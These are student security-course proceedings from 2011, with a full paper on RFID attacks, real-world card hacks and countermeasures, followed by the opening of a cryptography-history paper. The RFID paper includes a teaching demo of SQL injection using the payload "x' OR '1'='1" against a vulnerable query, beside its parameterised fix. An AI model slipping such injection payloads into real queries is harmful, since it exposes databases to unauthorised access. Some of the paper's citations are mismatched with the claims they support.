CS3235-SemI-2011-12 - School of Computing

NATIONAL UNIVERSITY OF SINGAPORE
SCHOOL OF COMPUTING
CS3235 - Semester I,
2011-2012
Computer Security
The Project Proceedings
for CS3235 - Computer Security
November 2011
Singapore
Table of Contents
The Security of RFID and its Implications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Kang Jun Lee, Jack Aw Yong, Raphael Wun
(Gp 1)
Cryptography: From a Historical Perspective . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
Wei Xiang Lim, Kok Wei Ooi, Tuan Kiet Vo
and Mei Xin Shirlynn Sim
(Gp 2)
Elliptic Curve Cryptography . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
Guan Xiao Kang, Chong Wei Zhi, Cheong Pui Kun Joan
(Gp 3)
Security Requirement in Different Environments. . . . . . . . . . . . . . . . . . . . . . . . . . . .53
Ru Ting Liu, Jun Jie Neo, Kar Yaan Kelvin Yip, Junjie Yang
(Gp 4)
Integer Factorization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
Romain Edelmann, Jean Gauthier, Fabien Schmitt
(Gp 5)
A Study into the Underlying Techniques Deployed in Smart Cards . . . . . . . . 109
Clement Tan, Qi Lin Ho, Soo Ming Poh
(Gp 6)
Analysis of Zodiac-340 Cipher. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .125
Yuanyi Zhou, Beibei Tian, Qidan Cai
(Gp 8)
The sampler of network attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139
Guang Yi Ho, Sze Ling Madelene Ng, Nur Bte Adam Ahmad
and Siti Najihah Binte Jalaludin
(Gp 9)
Report for the Study of Single-Sign-On (SSO), an introduction and comparison
between Kerberos based SSO and OpenID SSO . . . . . . . . . . . . . . . . . . . . . . . . . . . 163
Xiao Zupao
(Gp 10)
An Exploration into the Various Authentication Methods Used to Authenticate
Users and Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175
Gee Seng Richard Heng, Horng Chyi Chan, Huei Rong Foong
and Wei Jie Alex Chui
(Gp 11)
Different strategies used for securing IEEE 802.11 systems; the strengths and
the weaknesses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
Cheng Chang, Yu Gao
(Gp 12)
Malicious Software: From Neumann’s Theory of Self-Replicating Software to
World’s First Cyber Weapon . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211
Kaarel Nummert
(Gp 13)
Password Authentication for Web Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . 219
Shi Hua Tan, Wen Jie Ea, Rudyanna Tan
(Gp 14)
Data Security for E-transactions: Online Banking and Credit Card Payment
System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 239
Jun Lam Ho, Alvin Teh, Kaldybayev Ayan
(Gp 15)
A Review of the Techniques Used in Detecting Software Vulnerabilities . . . . 257
Nicholas Kor, Cheng Du
(Gp 17)
Intrusion and Prevention System Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267
Tran Dung, Tran Cong Hoang
(Gp 18)
An exploration into what Public Key Infrastructure is, how it’s implemented,
and how the greatest vulnerability of the Public Key Infrastructure has nothing
to do with their keys . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 283
Laurence Putra Franslay
(Gp 19)
The Security of RFID and its Implications
Kang Jun Lee, Jack Aw Yong, Raphael Wun
School of Computing, National University of Singapore
Abstract. The widespread use of RFID tags has greatly increased their market value, which in turn makes their security increasingly important. In this report, we investigate the security and vulnerabilities of RFID tags, both theoretically and through real-life examples. We also survey countermeasures and protocols against attacks on RFID tags, outline some existing prevention methods, and offer brief suggestions of our own on how to improve their security.
Keywords: RFID, Security, vulnerability of RFID, security of RFID, Radio
Frequency Identification
1 Introduction
Radio Frequency Identification, commonly known as RFID, has been around for decades. Its history can be traced all the way back to the Second World War. The Germans, Japanese, Americans and British all used radar during the war to warn of approaching planes while they were still miles away. However, they were unable to differentiate between friendly and hostile planes. The Germans discovered that if pilots rolled their planes as they returned to base, the radio signal reflected back would change. This indicated to the radar crew on the ground that those were German planes and not allied aircraft (this is, essentially, the first passive RFID system). The British, on the other hand, developed the first active identify friend or foe (IFF) system. They installed a transmitter on each of their planes. When it received signals from radar stations on the ground, it began broadcasting a signal back that identified the aircraft as friendly. RFID works on this same basic concept: a signal is sent to a transponder, which activates the integrated chip and either reflects back a signal (passive system) or broadcasts a signal (active system). [1]
The first RFID patent was filed in the U.S. by Mario W. Cardullo on January 23, 1973. He invented an active RFID tag with rewritable memory. In the same year, Charles Walton received a patent for a passive transponder used to unlock a door without a key. [1] Over the years, the technology has evolved and people keep finding new applications for it. It has evolved to the point where it is replacing the barcode technology we are familiar with: information can still be communicated without the contact or direct line of sight that barcode technology requires. A simple RFID system is made up of three components: i) an antenna, ii) an RFID reader and iii) an RFID tag.
The antenna of the RFID system broadcasts radio signals to activate the RFID tags in order to read and write data to them. The RFID reader broadcasts radio waves whose strength depends on the output power and the radio frequency being used. The read range can be as little as one inch or span as far as 100 feet or more. When an RFID tag is within the reader's broadcast range, the tag is activated and the reader decodes the data encoded in the tag's silicon chip. The decoded data can then be passed to a host computer for processing.
Since the birth of RFID technology, such systems have become cheaper to implement over the years. As a result, we come into contact with them in many areas of work and life. As the technology becomes more pervasive, just how secure is the data being transmitted? In this report we explore the different RFID tags on the market and some examples of their usage, investigate how secure the RFID systems around us are, and offer suggestions for enhancing the infrastructure.
2 Introduction to RFID and its Security
2.1 Types of RFID Tags
As discussed earlier, RFID tags can be active or passive; below is a list of the active and passive tags currently in use.
2.1.1 Active RFID Tags
Such tags have a radio signal transceiver and an onboard battery to power it. The integrated power supply allows the tag to activate itself regardless of whether an RFID reader is in proximity. Active RFID tags have longer read ranges because of this integrated power supply, compared to passive RFID tags, which have no battery or integrated transceiver.
Active RFID tags are commonly used together with Real Time Location Systems (RTLS) because of these characteristics. The embedded battery also allows extra sensors to be powered, e.g. for humidity, temperature or pressure measurement.
2.1.2 Passive RFID Tags
Passive RFID tags have no embedded transceiver or battery, and therefore have a shorter read range than active RFID tags and Battery-Assisted Passive RFID tags. When a passive tag enters the field generated by a reader, it is activated and responds by "reflecting" the reader's modulated signal; this technique is called "backscatter". The reader then receives and decodes the response.
Passive RFID tags are low in price and are commonly used for a wide range of applications in the market, but they are rarely used for RTLS because of the way they are activated. Such tags cannot carry extra sensors, as they have no integrated power supply.
2.1.3 Battery-Assisted Passive (BAP) RFID tags:
BAP RFID tags are passive RFID tags in nature and also use backscatter, but they have an integrated battery that keeps the integrated chip in a stand-by mode. Passive RFID tag read ranges are often short, as power must be channelled to the integrated chip to activate it. The distance between the reader and the passive tag determines whether the minimum energy threshold to activate the integrated chip is reached.
The battery in BAP RFID tags helps to overcome this minimum activation threshold, thereby increasing the read distance. When the battery is depleted, a BAP RFID tag behaves just like a regular passive RFID tag. BAP RFID tags are more expensive than regular passive tags but cheaper than active tags.
2.1.4 Passive RFID tags with Solar panel and Ultracapacitor:
Such tags function very similarly to BAP RFID tags, but use a combination of a built-in solar panel and an ultracapacitor instead of a battery. In lighted conditions, the solar panel provides energy to the RFID tag, enabling longer read ranges, while the ultracapacitor is being charged. Under poor light conditions or total darkness, the ultracapacitor is able to maintain the tag's read performance for many hours thanks to its stored energy.
If the tag remains in the dark for too long, the energy in the ultracapacitor is depleted and it functions like a normal passive RFID tag until it is exposed to light again.
2.1.5 Semi-passive RFID tags:
A semi-passive RFID tag still uses the backscatter technique to communicate with the reader. It has a battery that powers on-board microcontrollers and extra sensors, e.g. a temperature logger. When the battery is depleted, the semi-passive RFID tag stops transmitting any signal.
2.2 Applications of RFID Tags
Smart Cards
Passports
The above two applications of RFID tags carry information valuable to individuals as well as corporations. RFID smart cards can be used as security access cards like the NUS matriculation card, transport cards like our EZ-Link cards, and even credit cards. RFID passports contain information about their holders, who face identity theft should a hacker obtain that information.
There are of course other usages of RFID tags that do not involve sensitive information. For example, RFID tags are used in libraries, where books are tagged so that they can be located easily and unauthorized checkouts trigger an alarm. RFID tags are also used in marathon races to record runners' start and finish times; such tags are commonly termed "champion tags". Corporations likewise use RFID tags to track shipments and aid logistics accounting in the warehouse: workers no longer need to physically count products or scan barcodes to obtain the necessary information.
2.3 Security on RFID
2.3.1 Security of RFID Passports
An RFID passport uses Basic Access Control (BAC) to prevent personal information from being extracted without authorization. BAC uses data such as the passport number, date of birth and expiration date to derive a session key. This key is then used to encrypt the communication between the passport's integrated chip and a reading device. This mechanism is supposed to ensure that the owner of a passport can decide who may read the passport's electronic contents. [2]
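To make the key-derivation step concrete, the sketch below derives the BAC seed and session-key material from the three MRZ fields, following our reading of the ICAO Doc 9303 scheme. The field values used in any call are hypothetical, and the final DES parity-bit adjustment of the real standard is omitted for brevity.

```python
import hashlib

def bac_keys(doc_no, dob, expiry):
    """Derive BAC key material from MRZ fields (sketch).

    The 'MRZ information' (document number, date of birth and expiry
    date, each followed by its check digit) is hashed with SHA-1 and
    truncated to a 16-byte seed; Kenc and Kmac are then derived from
    the seed with a 4-byte counter.  DES parity adjustment is omitted.
    """
    def check_digit(data):
        # ICAO check digit: weights 7, 3, 1 over values 0-9 / A-Z / '<'
        vals = {c: i for i, c in enumerate("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ")}
        vals["<"] = 0
        return str(sum(vals[c] * w for c, w in zip(data, [7, 3, 1] * len(data))) % 10)

    mrz_info = (doc_no + check_digit(doc_no) +
                dob + check_digit(dob) +
                expiry + check_digit(expiry))
    k_seed = hashlib.sha1(mrz_info.encode("ascii")).digest()[:16]
    k_enc = hashlib.sha1(k_seed + b"\x00\x00\x00\x01").digest()[:16]
    k_mac = hashlib.sha1(k_seed + b"\x00\x00\x00\x02").digest()[:16]
    return k_seed, k_enc, k_mac
```

Note how little entropy actually feeds the key: a document number, a birth date and an expiry date, which is why BAC keys can sometimes be guessed.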
It also uses Extended Access Control (EAC) to protect other sensitive data, such as the information for iris and fingerprint recognition. Two types of EAC are implemented alongside BAC for passports issued in the European Union: EAC Chip Authentication (CA) and EAC Terminal Authentication (TA). [3]
The main aim of the CA step is to verify that the chip in the passport is not cloned and to establish a secure communication channel.
The TA step determines whether an Inspection System is allowed to read the sensitive data stored in the passport; it uses card-verifiable certificates issued by a document verifier. The lifespan of each certificate ranges from a day to a month. An Inspection System may hold several such certificates, each belonging to a country that allows the system to read the stored data.
2.3.2 Security of Smart Cards
The table above shows the various RFID frequency ranges together with their capabilities and applications.
EZ-Link cards, like a variety of other smart cards on the market, operate in the high-frequency range at 13.56 MHz. Examples of cryptographic techniques used on such smart cards are Triple DES, the Secure Hash Algorithm (SHA-1) and Crypto-1.
Triple DES applies the Data Encryption Standard (DES) cipher algorithm three times to each data block. Performing the encryption three times increases the effective key size, protecting against brute-force attacks and thereby increasing its reliability.
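The encrypt-decrypt-encrypt (EDE) composition behind Triple DES can be sketched with a toy one-byte XOR "cipher" standing in for DES; the point is only the three-key composition and its inverse, not the cipher itself, which is deliberately trivial here.

```python
# Toy illustration of the Triple-DES EDE construction.  The "cipher"
# is a one-byte XOR stand-in, not DES: we only show the composition
# C = E_k3(D_k2(E_k1(P))) and its inverse P = D_k1(E_k2(D_k3(C))).
def toy_encrypt(block, key):
    return bytes(b ^ key for b in block)

toy_decrypt = toy_encrypt  # XOR is its own inverse

def triple_ede_encrypt(block, k1, k2, k3):
    return toy_encrypt(toy_decrypt(toy_encrypt(block, k1), k2), k3)

def triple_ede_decrypt(block, k1, k2, k3):
    return toy_decrypt(toy_encrypt(toy_decrypt(block, k3), k2), k1)
```

Setting k1 = k2 collapses EDE to a single encryption under k3, which is how Triple DES implementations remain backward-compatible with single DES.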
The SHA-1 hash algorithm produces a 160-bit hash value. It is considered more secure than the MD5 algorithm and is used in secure protocols like SSH and SSL.
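The 160-bit output length is easy to verify with Python's standard hashlib module; the digest is always 20 bytes regardless of input size:

```python
import hashlib

# SHA-1 always yields a 160-bit (20-byte) digest, whatever the input.
digest = hashlib.sha1(b"abc").hexdigest()
print(digest)  # a9993e364706816aba3e25717850c26c9cd0d89d (FIPS 180 test vector)
print(len(hashlib.sha1(b"abc").digest()) * 8)  # 160
```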
Crypto-1 is made up of a 48-bit feedback shift register holding the main secret state of the cipher, a linear feedback function, a two-layer 20-to-1 nonlinear filter function, and a 16-bit LFSR used during the authentication phase. This cipher is not secure, yet it has been deployed in subway card systems.
3 Vulnerability of RFID systems
The invention of RFID brings much convenience to our daily life; the cards we use for transport or payment are great illustrations of its usage. However, RFID and its systems possess a series of vulnerabilities, leaving them susceptible to a broad range of malicious attacks, from pervasive eavesdropping to active interference.
RFID is prone to such attacks because of its contactless nature: attackers have many ways to extract information from cards that use this mechanism, and good countermeasures are hard to find.
3.1 Classification of RFID Attacks
Figure 1. Classification of RFID Attacks
Extracted from Classifying RFID Attacks and Defenses by
Aikaterini Mitrokotsa, Melanie R. Rieback, Andrew S. Tanenbaum [4]
The different types of RFID attacks can be categorized into four layers: the Physical Layer, the Network-Transport Layer, the Application Layer and the Strategic Layer. Apart from these, some attacks target multiple layers. [4]
In this research paper, only a handful of attacks relevant to daily life are described. For each layer, a short description of its vulnerabilities is given first, followed by the mechanism of each attack and a possible scenario showing how close it is to routine RFID usage.
3.1.1 Physical Layer
The physical layer in RFID communications comprises the physical interface, the radio signals, and the RFID devices that exchange information. Because RFID relies on wireless communication, this layer has poor physical security and little resilience against physical manipulation. Attacks here can permanently or temporarily disable RFID tags, or relay their communications.
3.1.1.1 Permanent disabling of RFID
RFID tags are extremely sensitive to static electricity and can be damaged instantly by electrostatic discharge caused by high-energy waves; such a discharge deactivates passive RFID tags permanently. For active RFID tags, the battery can be discharged by exposure to extremely high or low temperatures.
3.1.1.2 Temporary disabling of RFID
There are two types of attacks that can temporarily disable RFID tags:
(i) Passive interference: when an RFID network operates in an unstable and noisy environment, it is prone to interference and collisions from any source of radio noise (e.g. electronic generators or switching power supplies). Such interference can prevent accurate and efficient communication between the tag and the reader.
(ii) Active jamming: an adversary can take advantage of the fact that RFID devices listen indiscriminately to all radio signals in range. By generating signals in the same range, an attacker can prevent tags from communicating efficiently with readers.
3.1.1.3 Relay attacks
In a relay attack, an adversary acts as a man-in-the-middle: an adversarial device is placed between a legitimate RFID tag and a reader. The device can intercept and modify the radio signals while receiving communications from both the legitimate tag and the legitimate reader.
Relay attacks can be further categorized into two types:
(i) Mafia fraud: an illegitimate party relays information between two legitimate parties.
(ii) Terrorist fraud: a dishonest but legitimate tag cooperates by relaying information to an illegitimate third party; however, the dishonest tag does not share its secrets with the relaying party.
3.1.2 Network - Transport Layer
Attacks on this layer target the way RFID systems communicate and the way data is transferred between the entities (reader, tag) of an RFID network.
3.1.2.1 Cloning
Cloning refers to producing a replica of an RFID tag. If an RFID tag has no security features, cloning is as simple as copying the tag's ID and any associated data to the clone tag. If the tag has extra security features, the attacker must perform a more sophisticated attack to fool the reader into accepting the clone as legitimate. Cloned tags ultimately cause confusion and violate system integrity.
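A minimal sketch (all names hypothetical) of why an ID-only tag is trivially cloneable: if the reader checks nothing beyond the broadcast ID, a device that replays the tag's response is indistinguishable from the original.

```python
# Minimal model of an ID-only tag.  A reader that checks only the
# broadcast ID cannot tell a clone from the original tag.
class Tag:
    def __init__(self, uid, data):
        self.uid, self.data = uid, data

    def respond(self):
        # What the tag emits when energised by a reader's field.
        return (self.uid, self.data)

def reader_accepts(tag, known_uids):
    # The reader's entire "check": is the claimed UID on its list?
    return tag.respond()[0] in known_uids

original = Tag("04:A2:5F:11", {"balance": 25})
clone = Tag(*original.respond())   # cloning = recording and replaying
```

Here `reader_accepts(clone, {"04:A2:5F:11"})` returns True exactly as it does for the original, which is why tags protecting anything of value need a challenge-response step.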
3.1.2.2 Spoofing
Spoofing is a variant of cloning that does not physically replicate the RFID tag. It employs special devices with increased functionality that can emulate an RFID tag given some data content. The adversary impersonates a valid RFID tag to gain the privileges and communication access of the original tag.
3.1.2.3 Reader Attacks
(i) Impersonation: since RFID communication is usually unauthenticated, adversaries can counterfeit the identity of real tag readers to elicit sensitive information or modify data. Interestingly, the difficulty of such attacks ranges from very easy to practically impossible.
(ii) Eavesdropping: the wireless nature of RFID makes eavesdropping one of the most serious and easily deployable threats. An unauthorized individual can use an antenna to record communications between legitimate tags and readers. The feasibility of this attack depends on factors such as the distance between the attacker and the legitimate RFID devices.
3.1.3 Application Layer
Attacks on this layer mostly relate to applications and the binding between users and RFID tags. They include unauthorized tag reading, modification of tag data and attacks on the application middleware.
3.1.3.1 Tag modification
An adversary can abuse writable memory to modify or delete valuable information, depending on the RFID standard in use and the read/write protection it employs. The impact of such attacks depends largely on the tags in use and the degree of modification, especially when the tags carry critical information about objects or people. If the reader is fooled into treating a tag as unmodified, the adversary can write falsified information into it. The consequences could be severe, for example with an RFID tag containing a patient's information and the drugs he is supposed to take.
3.1.3.2 Middleware Attacks
Buffer overflow: middleware that uses fixed-length buffers can be attacked; an adversary can launch a buffer overflow attack against the back end of the RFID middleware.
Malicious code injection: using a technique such as SQL injection, an adversary can inject malicious code that compromises the back-end RFID system. The attack relies on the unexpected execution of SQL statements, leading to unauthorized access to the back-end database and subsequently revealing or modifying data stored in the back-end RFID middleware.
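The SQL injection risk can be demonstrated with Python's built-in sqlite3 module; the table and payload below are hypothetical. The first query splices attacker-controlled tag data straight into the SQL string, while the second passes it as a bound parameter.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE tags (uid TEXT, owner TEXT)")
conn.execute("INSERT INTO tags VALUES ('A1', 'alice'), ('B2', 'bob')")

tag_uid = "x' OR '1'='1"  # attacker-controlled data read from a tag

# Vulnerable: the payload is pasted into the SQL string, so the
# injected OR clause makes the query match every row in the table.
bad = conn.execute(
    "SELECT owner FROM tags WHERE uid = '%s'" % tag_uid).fetchall()

# Safe: a parameterised query treats the payload as an opaque value.
good = conn.execute(
    "SELECT owner FROM tags WHERE uid = ?", (tag_uid,)).fetchall()
```

The vulnerable query returns every row; the parameterised one returns none, because the payload never matched a real UID.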
3.1.4 Strategic Layer
The strategic layer is not covered in this report, as its impact is less applicable to our field of research.
3.1.5 Multilayer attacks
3.1.5.1 Denial of Service Attacks
Normal operation of RFID tags may be interrupted intentionally by blocking access to them. Such deliberate blocking of access, and the subsequent denial of service, can be caused by malicious use of "blocker tags". Another form of DoS attack is the unauthorized use of LOCK commands, which several RFID standards include to prevent unauthorized writing to an RFID tag's memory.
3.1.5.2 Crypto attacks
Attackers can employ cryptographic attacks to break the cryptographic algorithms in use and reveal or manipulate sensitive information. By performing, for example, a brute-force attack, one can break a weak encryption key and obtain the protected information.
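The following toy sketch shows why key length is the whole defence against brute force: a deliberately tiny 16-bit XOR key falls in at most 65,536 trials, whereas each additional key bit doubles the work.

```python
# Brute-forcing a toy cipher with a deliberately tiny key space.
# A 16-bit key falls within 2**16 = 65536 trials; real ciphers resist
# this attack only through key length (e.g. 2**112 for Triple DES).
def xor_encrypt(data, key16):
    keybytes = key16.to_bytes(2, "big")
    return bytes(b ^ keybytes[i % 2] for i, b in enumerate(data))

def brute_force(ciphertext, known_plaintext):
    # Try every possible key; XOR decryption is the same operation.
    for key in range(2 ** 16):
        if xor_encrypt(ciphertext, key) == known_plaintext:
            return key
    return None
```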
3.2 Real world implications
As seen above, there are various ways for a hacker to crack an RFID system. For example, in 2008 a group of MIT students published a paper revealing how to hack the Crypto-1-based RFID system of the Boston subway. [5]
Such hacks are not restricted to the United States. The Oyster card, the United Kingdom's equivalent of Singapore's EZ-Link card, was hacked in the same year: a group of German scientists managed to crack the Mifare chip in the Oyster card and showed how one could take a free ride on London transport. [6]
They later published their findings on a security exploit against the Mifare DESFire MF3ICD40, which is commonly used as an RFID smart card, using an approach previously applied to other wireless crypto systems. The attacker must first have the smart card physically, along with an RFID reader and a radio probe, and then performs a template "side-channel" attack on the card's cryptography. Using differential power analysis, data is collected from the radio-frequency energy that leaks out of the card (the "side channels"). Through this process, the entire 112-bit secret key of the Mifare DESFire MF3ICD40, which uses Triple DES encryption, was retrieved. [6][7]
Further examples show that the vulnerability is not restricted to public transport systems. A hacker in the United Kingdom devised a fast and cheap way to crack the RFID encryption on an American Express card: for US$8, one can obtain a reader and software on eBay, extract information from the card, and proceed with the cracking procedure. [8]
The same applies to electronic passports. Despite all the security measures that most electronic passports claim to have, including an encrypted session key, the information stored in an RFID passport is still not safe: researchers in the Netherlands have found a way to read some of the stored information remotely. [9]
These examples show that even the relatively strong encryption algorithms used in "touchless" smart cards can be cracked with a small investment of time and the right equipment, exposing the shared crypto key and the data the cards store. Many RFID systems around us are thus vulnerable, and more security measures have to be applied to ensure that these systems are safe to use.
4 Countermeasures for Attacks on RFID Systems
RFID attacks are easy to mount and hard to prevent because of the tags' cheap and contact-free nature. Although better encryption algorithms could prevent loss of data confidentiality, implementing them on an RFID chip is costly and infeasible for most RFID systems, since the systems are restricted to a low price point (such as smart cards for transport systems), which also means limited resources on the chip for such algorithms. [10]
Moreover, confidentiality itself often does not stop hackers from exploiting the system. For example, simply cloning an RFID chip can let a hacker achieve his goal without ever knowing what the chip contains. Ensuring the security of such systems is a big challenge, and much effort has gone into this issue. Beyond basic encryption and hashing, there are further methods to prevent RFID attacks.
4.1 Authentication
Some RFID chips adopt policies that allow reading only by specified devices. Unauthorized devices are not permitted to read from the chip, which prevents sniffing by unauthorized readers. [11]
4.2 Physical Shielding
Besides things that can be improved on the system, there are ways to improve security
by the efforts of end user. We can make use of a physical method, which makes use of
a thing called the Faraday net (from electro-magnetic field theory, container made of
conductor can shield radio wave, and is called a Faraday net.). [12] The user can put
their RFID within a Faraday net all times, and take them out only when they meet the
need. This can prevent the RFID from being read unless the user is required to use
them, and this can prevent unwanted leakage of data from the RFID chips.
But, it is impossible to force every user to cultivate such habit, which makes this
method impractical to make use of. However this can be noted as a personal
countermeasure for anyone who wishes to keep their RFID materials safe.
4.3 Back-end monitoring
Since it is practically impossible to ensure perfect security for systems based on cheap RFID chips, another option is to 'cure' instead of 'prevent': constantly monitor the RFID back end for suspicious actions (such as a possible cloned-RFID access) and investigate when one is detected. [13]
One example scheme we can propose is the following. Taking public transport cards (EZ-Link, Oyster) as an example, the back end can maintain the integrity of a card by storing usage information (time, location, etc.) both on the card and on the back-end server whenever the card is used. The card thus stores some of its recent usage records. Because the card carries a usage history, a cloned card will diverge from the original once the cards are used more than once (by different users). This divergence shows up at the back-end server, since some of the access entries recorded at the server will be missing from each card. Once such a mismatch occurs, the system can detect it and alert the system manager, who decides what actions to take next.
This does not actually make the RFID system safer, but it makes the system harder to exploit without being noticed. It enables a quick response once a misuse is detected, before further losses accrue from the consequences of the misuse.
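A minimal sketch of the scheme proposed above, with all class and field names hypothetical: the back end keeps the full usage log per card UID, each card keeps only its own recent entries, and a clone is flagged when its stored history stops being a suffix of the server's log.

```python
# Sketch of back-end clone detection.  The server holds the complete
# usage log per card UID; each physical card stores its own recent
# entries.  After a clone and the original are used independently,
# one of them will be missing entries the server has recorded.
class Backend:
    def __init__(self):
        self.log = {}                        # uid -> list of usage entries

    def record(self, card, entry):
        self.log.setdefault(card.uid, []).append(entry)
        card.history.append(entry)           # entry also written to card

    def is_suspect(self, card):
        # A genuine card's history is always a suffix of the server log.
        server = self.log.get(card.uid, [])
        n = len(card.history)
        return card.history != server[-n:] if n else False

class Card:
    def __init__(self, uid):
        self.uid = uid
        self.history = []
```

In this model, a clone made by copying a card's contents stays undetected only until the original (or the clone) is used again; the next comparison against the server log reveals the mismatch.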
These extra countermeasures can be taken to protect RFID systems. As add-ons to the basic security standards, they enable RFID to achieve a better security level.
5 Conclusion
After looking at various RFID systems and their security standards, we have arrived at the conclusion that RFID systems are vulnerable and need to be improved with newer standards. There are, however, big obstacles, such as the low-cost constraint on some systems and the contact-free nature of RFID communication. Although many security mechanisms, including encryption, hashing and authentication, are in place, most RFID systems remain vulnerable to various types of attack, some of them unavoidable. At this point, being aware of the insecurity of RFID-based identification becomes very important, because the system alone cannot ensure perfect security. Public awareness of RFID insecurity should be raised, as this is currently still the best way to prevent RFID attacks.
References
1. M. Roberti, “The History of Rfid Technology - Rfid Journal,” rfidjournal.com,
http://www.rfidjournal.com/article/view/1338/1 (accessed October 29, 2011).
2. Hopewell, Luke. Rfid, E-Passport Security at Risk: Aus Govt. ZDNet, May 31,2011.
http://www.zdnetasia.com/rfid-e-passport-security-at-risk-aus-govt-62300530.htm
3. D. Kugler, “Extended Access Control: Infrastructure and Protocol” (June 1, 2006),
http://www.interoptest-berlin.de, PDF file, http://www.interoptest-berlin.de/pdf/Kuegler__Extended_Access_Control.pdf
4. A. Mitrokotsa, M. R. Rieback, A. S. Tanenbaum. “Classifying RFID Attacks and Defenses.”
Amsterdam, n.d.
5. R. Ryan, Z. Anderson, A. Chiesa, “Anatomy of a Subway Hack”,
http://tech.mit.edu/V128/N30/subway/Defcon_Presentation.pdf
6. “Oyster card ‘free travel’ hack to be released”, ITPRO.co.uk, July 22, 2008,
http://www.itpro.co.uk/604770/oyster-card-free-travel-hack-to-be-released
7. S. Gallagher, “Researchers hack crypto on RFID smart cards used for keyless entry and transit pass,” Ars Technica, Oct 11, 2011,
http://arstechnica.com/business/news/2011/10/researchers-hack-crypto-on-rfid-smart-cards-used-for-keyless-entry-and-transit-pass.ars
8. SDN Staff, “Researchers hack popular smartcard used for access control,” Security Director News, Oct 18, 2011. http://www.securitydirectornews.com/?p=article&id=sd201110z7V0yY
9. “RFID credit cards easily hacked with $8 reader”, Engadget.com, March 19 2008,
http://www.engadget.com/2008/03/19/rfid-credit-cards-easily-hacked-with-8-reader/
10. “Passport RFIDs cloned wholesale by $250 eBay auction spree”, theregister.co.uk,
February 2 2009, http://www.theregister.co.uk/2009/02/02/low_cost_rfid_cloner/
11. F. Klaus. “Known attacks on RFID systems, possible countermeasures and upcoming
standardisation activities.” 2009.
12. W. Qinghua, X. Xiaozhong, T. Wenhao, H. Liang. “Low-cost RFID: security problems and
solutions.”
13. D. N. Duc, H. R. Lee, Divyan M. Konidala, K. Kim. “Open Issues in RFID Security.”
Daejeon, 2009.
Cryptography:
From a Historical Perspective
Wei Xiang Lim, Kok Wei Ooi, Tuan Kiet Vo,
Mei Xin Shirlynn Sim,
Computing 1, 13 Computing Drive,
Singapore (117417), Republic of Singapore
{u0807150, u0906907, 0807235, u0806996}@nus.edu.sg
Abstract. In this paper, we study a variety of cryptography systems introduced across different time periods, from the classical ancient era to modern times. For each cipher, we address its characteristics, its history, how it works (with explanations or examples of how it attains message confidentiality), and its limitations. Besides encryption, some cryptography systems in the modern context also play an important role in authenticating the identity of the sender.
Keywords: cryptography techniques, message confidentiality, security,
plaintext messages, cipher-texts, brute-force, cipher, monoalphabetic,
polyalphabetic, substitution, block, fractionating, digraph, encrypt, decrypt.
1
Introduction
The history of cryptography can be divided into four major phases, namely the
ancient age, the pre-World War I period, wartime and the modern era.
Cryptography refers to the act of concealing the written contents of messages
from unintended recipients. In ancient times, cryptography was used largely for
private communication, art, and religious and military purposes. At that time,
cryptography was tantamount to encryption, as the focus was mainly on converting
written messages into cipher-texts. This was done to ensure message confidentiality:
message contents would be protected against unintended, possibly malicious, recipients
during delivery from one location to another. From ancient civilization to the
early twentieth century, cryptographers developed and performed considerably
uncomplicated algorithms on paper. This happened as early as 1900 B.C., when
Egyptians inscribed non-standard hieroglyphs on papyrus and wood.
In the modern era, as computer communications became prevalent, new
cryptography techniques were developed. These techniques are supported by more
complex mathematical functions and stronger scientific approaches. As a result,
cracking an encryption key within a reasonable time frame using current
computational technology and algorithms has become considerably more difficult.
For communications and electronic transactions over networks like the Internet,
cryptography is deemed a necessity to prevent malicious attacks. Besides ensuring message
confidentiality, modern cryptography goals also include ensuring message integrity,
authentication, and non-repudiation. In order to attain these goals, three cryptography
schemes, namely symmetric cryptography, asymmetric cryptography and hash
functions are used.
1.1 Purpose of Website
The aim of our “CryptograFreaks” website is to provide a learning platform for
people who are interested in the workings behind cryptographic systems. Visitors to
our website will be able to attempt to encode and decode their own messages with the
use of various cryptographic applets featured. In addition, we also endeavour to reach
out and enhance the learning experiences of visitors who have no prior knowledge
about the topic of cryptography. You can access our website at the following address:
http://www.freedom316.com/cryptografreaks
2
Ancient Cryptography
In this segment, we will be exploring two ancient cryptography techniques and their
features, specifically the Atbash cipher and the Caesar cipher.
2.1 Atbash Cipher
(http://www.freedom316.com/cryptografreaks/atbash.php)
The Atbash cipher is a monoalphabetic substitution cipher for the Hebrew alphabet.
In 500 B.C, the Scribes in Israel wrote the book of Jeremiah using the Atbash
cipher. The Hebrew language consists of a few ciphers and the Atbash cipher is one
of them. From 500 B.C. till 1300 A.D., the Atbash cipher was used by the Jews,
Gnostics, Cathars and Knights Templar to conceal important names from third
parties so as to avoid persecution. At that time, the Knights Templar were not allowed to
worship any idols apart from God. However, due to the influence of St Bernard of
Clairvaux, they devised an encryption to represent their admiration for the
Greek goddess of wisdom, Sophia. Upon encryption, her name was
represented by the word “Baphomet”. Unfortunately, it soon became known
that the Knights Templar had committed idolatry, and many of them were captured
and sentenced to death. With the help of the Atbash cipher, other Knights Templar
managed to escape the death sentence, as the encrypted names belonging to them could
not be identified. It was only in the 20th century that a biblical scholar, Dr Hugh J.
Schonfield, applied the cipher to decipher words which he thought were
senseless. As a result, he uncovered mysteries of Judaism’s history and of the
Knights Templar.
The cipher reverses the alphabet, substituting the first letter of the alphabet with
